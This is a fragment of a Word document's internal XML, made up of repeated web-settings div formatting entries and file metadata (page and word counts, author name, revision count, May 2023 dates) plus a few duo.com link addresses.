    <w:div w:id="780684293">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="841121342">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="894201713">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="902520716">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="991837761">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1189682498">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1340431168">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1349017385">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1519542876">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1526750758">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1530414673">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1669285931">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1849753730">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1921744470">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1965426763">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1970433994">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2062747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community.duo.com/"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uo.com/blo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uo.com/doc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uo.com/"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438</TotalTime>
  <Pages>27</Pages>
  <Words>7320</Words>
  <Characters>41724</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Marepalli</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Harish Marepalli</cp:lastModifiedBy>
  <cp:revision>148</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-19T07:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-21T06:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>